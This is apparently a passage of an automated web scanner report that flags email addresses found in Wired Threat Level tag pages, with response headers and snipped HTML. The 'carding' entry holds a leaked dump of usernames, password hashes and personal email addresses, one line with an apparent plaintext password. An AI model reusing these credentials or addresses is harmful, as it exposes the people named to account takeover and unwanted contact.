Host:	http://www.wired.com
Path:	/threatlevel/tag/blackhat/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
eecue@eecue.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:44:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:34:07 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.105. http://www.wired.com/threatlevel/tag/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/bradley-manning/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:06:25 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=62
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.106. http://www.wired.com/threatlevel/tag/carding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/carding/

Issue detail

The following email addresses were disclosed in the response:

Mehmet-43-@hotmail.de
asdfg-1337@web.de
cadazadmin@gmail.com
david_kravets@wired.com
deimos@carders.cc
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
nowolix@hotmail.de
ryan_singel@wired.com
shgustin@gmail.com
soh.cyberhood@googlemail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=54
Expires: Wed, 12 Jan 2011 15:34:05 GMT
Date: Wed, 12 Jan 2011 15:33:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>DEIM0S:97e36bdc7778264c9ca785b86beda24a277c4713::deimos@carders.cc<br />
Nowo:bdda38c461e2bcaf54c8c0d0adf9b946::nowolix@hotmail.de<br />
MoneyBoss:2dca6800fdf6ea230f48ba307b68e5bf::asdfg-1337@web.de<br />
sPloiT:5f2c0db92c5c716a2e4e4e55bca6b995::cadazadmin@gmail.com<br />
Moq:da2384e118f6d9aca8c0d832fdf28c90c4218c8a:fenerbahce::Mehmet-43-@hotmail.de<br />
cyberhood:29b0b59fd185b3b4a7072fb374e282e19cdc3361::soh.cyberhood@googlemail.com
</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.107. http://www.wired.com/threatlevel/tag/ccc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/ccc/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:01 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=87
Expires: Wed, 12 Jan 2011 15:34:45 GMT
Date: Wed, 12 Jan 2011 15:33:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.108. http://www.wired.com/threatlevel/tag/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/censorship/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:02 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:25 GMT
Date: Wed, 12 Jan 2011 15:33:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.109. http://www.wired.com/threatlevel/tag/china/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/china/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:03 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=2
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:33:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.110. http://www.wired.com/threatlevel/tag/copyright/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/copyright/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:05 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=32
Expires: Wed, 12 Jan 2011 15:34:01 GMT
Date: Wed, 12 Jan 2011 15:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.111. http://www.wired.com/threatlevel/tag/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/crime/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
krebsonsecurity@gmail.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=57
Expires: Wed, 12 Jan 2011 15:34:33 GMT
Date: Wed, 12 Jan 2011 15:33:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:krebsonsecurity@gmail.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.112. http://www.wired.com/threatlevel/tag/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/defcon/

Issue detail

The following email addresses were disclosed in the response:

dave@eecue.com
david_kravets@wired.com
eecue@eecue.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

18.113. http://www.wired.com/threatlevel/tag/dmca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/dmca/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:08 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=5
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:34:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.114. http://www.wired.com/threatlevel/tag/facebook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/facebook/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:35:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:35:05 GMT
Date: Wed, 12 Jan 2011 15:34:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.115. http://www.wired.com/threatlevel/tag/fbi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/fbi/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:09 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=4
Expires: Wed, 12 Jan 2011 15:34:12 GMT
Date: Wed, 12 Jan 2011 15:34:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.116. http://www.wired.com/threatlevel/tag/file-sharing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/file-sharing/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:54:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=475
Expires: Wed, 12 Jan 2011 15:42:07 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.117. http://www.wired.com/threatlevel/tag/first-amendment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/first-amendment/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:11 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=460
Expires: Wed, 12 Jan 2011 15:41:52 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.118. http://www.wired.com/threatlevel/tag/google/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/google/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:33:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:15 GMT
Date: Wed, 12 Jan 2011 15:34:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
